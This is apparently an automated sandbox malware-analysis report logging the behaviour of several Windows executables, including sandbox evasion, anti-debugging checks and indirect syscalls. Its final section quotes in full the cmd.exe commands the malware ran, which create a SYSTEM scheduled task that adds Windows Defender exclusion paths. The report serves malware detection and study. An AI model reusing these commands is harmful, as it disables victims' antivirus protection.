Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Opens the same file many times (likely Sandbox evasion)
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeFile opened: \Device\RasAcd count: 81647
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D6B3E38
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D65BC04
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D6B5143
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7A1EB4
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D6F080B
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D60DE34
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7F7912
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 3D54F7E
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 40DED6D
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 40D50CF
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 3D5A3BD
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 3CF5D5F
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D6990FC
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D73183C
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D72F839
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D6F2089
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7C6E74
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D698B19
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D061EB4
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D079F9E
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF590FC
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D06CBDE
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CFA87B1
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CECDE34
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D0B7912
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D0C8092
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF5A03F
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D06B056
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CFB080B
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D0A6565
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7E2F48
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7F91B6
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7B9F9E
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF2A03F
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF6F34F
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF787AA
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D03B056
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF787B1
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D087912
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D68F12B
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D785F8C
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF290FC
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D03CBDE
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CFC183C
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF43E38
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF8080B
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF4FFCB
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D0891B6
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D072F48
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D73C0AF
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D076565
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D6E87B1
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7E6565
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF45143
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF28B19
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6D056E74
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF1F12B
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CFBF839
Source: C:\ProgramData\dTuXOGtw.exeAPI/Special instruction interceptor: Address: 687DB3
Source: C:\ProgramData\dTuXOGtw.exeAPI/Special instruction interceptor: Address: 691676
Source: C:\ProgramData\dTuXOGtw.exeAPI/Special instruction interceptor: Address: 6F5857
Source: C:\ProgramData\dTuXOGtw.exeAPI/Special instruction interceptor: Address: 6EAD53
Source: C:\ProgramData\dTuXOGtw.exeAPI/Special instruction interceptor: Address: 660CC6
Source: C:\ProgramData\dTuXOGtw.exeAPI/Special instruction interceptor: Address: 6F1DE7
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D7ACBDE
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeAPI/Special instruction interceptor: Address: 6D758647
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CEECBDE
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CEE1EB4
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CE7183C
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CE287B1
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CD4DE34
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF37912
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeAPI/Special instruction interceptor: Address: 6CF26565
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: OutputDebugStringW count: 1923
Source: C:\Users\user\Documents\ieiUC1.exeWindow / User API: threadDelayed 9827Jump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeWindow / User API: threadDelayed 9172
Source: C:\ProgramData\dTuXOGtw.exeWindow / User API: threadDelayed 8757
Source: C:\ProgramData\dTuXOGtw.exeWindow / User API: threadDelayed 795
Source: C:\Users\user\Desktop\183643586-388657435.07.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_38-3215
Source: C:\Users\user\Documents\ieiUC1.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-14045
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_39-3236
Source: C:\Users\user\Documents\ieiUC1.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\183643586-388657435.07.exe TID: 7588Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exe TID: 7576Thread sleep count: 114 > 30Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exe TID: 7576Thread sleep time: -228000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exe TID: 5404Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exe TID: 7576Thread sleep count: 9827 > 30Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exe TID: 7576Thread sleep time: -19654000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 5928Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7108Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 1620Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7852Thread sleep count: 69 > 30
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7852Thread sleep time: -69000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7112Thread sleep count: 78 > 30
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7112Thread sleep time: -39000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 924Thread sleep time: -36000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 1856Thread sleep count: 48 > 30
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7852Thread sleep count: 9172 > 30
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 7852Thread sleep time: -9172000s >= -30000s
Source: C:\Program Files (x86)\DXESuT\DXESuT.exe TID: 1620Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\dTuXOGtw.exe TID: 2420Thread sleep count: 70 > 30
Source: C:\ProgramData\dTuXOGtw.exe TID: 2420Thread sleep time: -210000s >= -30000s
Source: C:\ProgramData\dTuXOGtw.exe TID: 964Thread sleep count: 112 > 30
Source: C:\ProgramData\dTuXOGtw.exe TID: 964Thread sleep time: -336000s >= -30000s
Source: C:\ProgramData\dTuXOGtw.exe TID: 964Thread sleep count: 8757 > 30
Source: C:\ProgramData\dTuXOGtw.exe TID: 964Thread sleep time: -26271000s >= -30000s
Source: C:\ProgramData\dTuXOGtw.exe TID: 2420Thread sleep count: 795 > 30
Source: C:\ProgramData\dTuXOGtw.exe TID: 2420Thread sleep time: -2385000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBEA1B8 FindFirstFileExW,2_2_00007FFAADBEA1B8
Source: C:\Users\user\Documents\ieiUC1.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeThread delayed: delay time: 30000
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeThread delayed: delay time: 30000
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: 183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000118000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36116090151.0000000000118000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\ieiUC1.exeAPI call chain: ExitProcess graph end nodegraph_2-14046
Source: C:\Users\user\Documents\ieiUC1.exeAPI call chain: ExitProcess graph end nodegraph_2-14389
Source: C:\Users\user\Desktop\183643586-388657435.07.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\ProgramData\dTuXOGtw.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400073E0 LdrLoadDll,2_2_00000001400073E0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0000000140007C91
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_000000014000F000
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 37_3_053F0643 mov eax, dword ptr fs:[00000030h]37_3_053F0643
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 37_3_053F00CD mov eax, dword ptr fs:[00000030h]37_3_053F00CD
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 37_3_02D900CD mov eax, dword ptr fs:[00000030h]37_3_02D900CD
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 37_3_02D90643 mov eax, dword ptr fs:[00000030h]37_3_02D90643
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,2_2_0000000140004630
Source: C:\Users\user\Documents\ieiUC1.exeProcess token adjusted: DebugJump to behavior
Source: C:\ProgramData\dTuXOGtw.exeProcess token adjusted: Debug
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0000000140007C91
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00000001400106B0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400092E0 SetUnhandledExceptionFilter,2_2_00000001400092E0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBE2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFAADBE2630
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBE1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFAADBE1F50
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBE76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFAADBE76E0
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 38_2_000A10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_000A10CC
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 38_2_000A2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_000A2AE2
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 38_2_000A51FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_000A51FB
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCode function: 39_2_000F10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_000F10CC
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCode function: 39_2_000F2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_000F2AE2
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCode function: 39_2_000F51FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000F51FB

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\ieiUC1.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeNtProtectVirtualMemory: Indirect: 0x2B7B253Jump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeNtDelayExecution: Indirect: 0x1BA0D5Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeNtProtectVirtualMemory: Indirect: 0x2B9B253Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeNtProtectVirtualMemory: Indirect: 0x2C1B253Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
